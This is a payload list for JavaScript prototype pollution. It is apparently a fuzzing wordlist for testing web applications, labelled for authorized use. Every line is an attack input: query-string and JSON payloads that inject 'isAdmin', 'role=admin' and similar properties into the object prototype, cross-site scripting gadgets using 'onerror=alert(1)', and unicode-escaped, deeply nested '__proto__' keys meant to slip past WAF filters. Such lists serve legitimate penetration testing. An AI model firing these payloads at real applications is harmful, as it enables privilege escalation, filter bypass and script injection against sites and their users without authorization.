# Prototype pollution — constructor / __proto__ alternative paths (bypass filters)
# Use when WAF blocks __proto__ string. Authorized testing only.

constructor[prototype][polluted]=yes
constructor.prototype.polluted=yes
constructor[prototype][isAdmin]=true
constructor[prototype][admin]=1
constructor[prototype][role]=admin
constructor[prototype][status]=510
constructor[prototype][json spaces]=10
constructor[prototype][innerHTML]=<img/src/onerror=alert(1)>
constructor[prototype][src]=javascript:alert(1)
constructor[prototype][onerror]=alert(1)
Object.__proto__["evilProperty"]="evilPayload"
Object.__proto__.evilProperty="evilPayload"
Object.constructor.prototype.evilProperty="evilPayload"
Object.constructor["prototype"]["evilProperty"]="evilPayload"
{"constructor":{"prototype":{"polluted":true}}}
{"constructor":{"prototype":{"isAdmin":true}}}
{"a":{"constructor":{"prototype":{"polluted":true}}}}
x[__proto__][abaeead]=abaeead
x.__proto__.edcbcab=edcbcab
__proto__[eedffcb]=eedffcb
__proto__.baaebfc=baaebfc
?constructor[prototype][test]=test
?constructor.prototype.test=test
?a[constructor][prototype][onerror]=alert(1)
?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1)
?x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror=alert(1)>
{"__proto__":{"constructor":{"prototype":{"polluted":true}}}}
{"__pro__to__":{"polluted":true}}
{"__proto__":{"polluted":true}}
{"__proto\x5f_":{"polluted":true}}
{"__proto\u005f_":{"polluted":true}}
{"__proto\u005f\u005f":{"polluted":true}}
{"__proto\u005f\u005f":{"isAdmin":true}}
{"__proto\u005f\u005f":{"constructor":{"prototype":{"polluted":true}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}}}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}}}}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}}}}}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}}}}}}}}}
{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"__proto\u005f\u005f":{"polluted":true}}}}}}}}}}}}}
